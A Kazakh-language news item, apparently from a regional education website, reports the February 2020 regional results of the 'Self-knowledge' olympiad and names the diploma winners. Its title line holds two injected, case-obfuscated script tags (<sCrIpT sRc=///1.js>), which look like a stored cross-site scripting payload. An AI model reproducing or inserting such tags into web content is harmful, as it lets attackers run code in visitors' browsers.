2020 жылдың 25-27 ақпан аралығында «Өзін-өзі тану» республикалық олимпиадасының облыстық кезеңінің қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.02.2020
2020 жылдың 25-27 ақпан аралығында Көкшетау қаласы, дарынды балаларға арналған №3 облыстық мамандандырылған мектеп – интернатының базасында 10-11 сынып оқушыларына арналған «Өзін-өзі тану» республикалық олимпиадасының облыстық қорытынды кезеңі өткізілді.
Олимпиадасының мақсаты: құндылықтар бағдарларын қалыптастыру арқылы балалар мен жасөспірімдерге рухани-адамгершілік білім беру, шығармашылық әлеуетті дамыту, шығармашылық қызметте өзін-өзі көрсетуге ұмтылысты көтермелеу, қоғамға риясыз қызмет етуге бағытталған жеке қасиеттерді, азаматтық ұстанымды, жоғары адамгершілік қасиеттерді, жасампаздық белсенділікті көрсету, өзін-өзі жетілдіруге және өзін-өзі тануға ұмтылу.
Қатысушылардың жалпы саны 35 оқушысы.
Олимпиаданың қорытындысы нәтижесінде І дәрежелі дипломмен келесі оқушылар марапатталды:
- Альберг Анастасия - Бұланды ауданы, Макинск мектеп-гимназиясының 10 сынып оқушысы;
- Абрамова Елизавета - Степногорск қаласы, А. Құнанбаев атындағы №6 мектеп-гимназиясының 11 сынып оқушысы;
ІІ дәрежелі дипломмен келесі оқушылар марапатталды:
- Сыздыкова Мейірім - Көкшетау қаласы, дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;
- Таскаринова Жансая - Біржан сал ауданы, Абай атындағы №2 қазақ орта мектебінің 10 сынып оқушысы;
ІІІ дәрежелі дипломмен келесі оқушылар марапатталды:
- Абаева Мариям - Аршалы ауданы, Сары - Оба орта мектебінің 10 сынып оқушысы;
- Козуб Виктория - Сандыктау ауданы, Балкашин №2 орта мектебінің 10 сынып оқушысы;
- Ким Виктория - Степногорск қаласы, дарынды балаларға арналған №4 "Болашақ" облыстық мамандандырылған мектеп-интернатының 10 сынып оқушысы;
- Минец Юлия - Атбасар ауданы, №2 орта мектебінің 11 сынып оқушысы;
- Шрамко Милена - Целиноград ауданы, Жанаесіл ауылы №32 орта мектебінің 11 сынып оқушысы;
- Алмаханова Айдана - Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;
І, ІІ орынға ие болған жүлдегерлерімізге Талдықорған қаласында өтетін «Өзін-өзі тану» республикалық олимпиадасының қорытынды кезеңінде сәттілік тілейміз!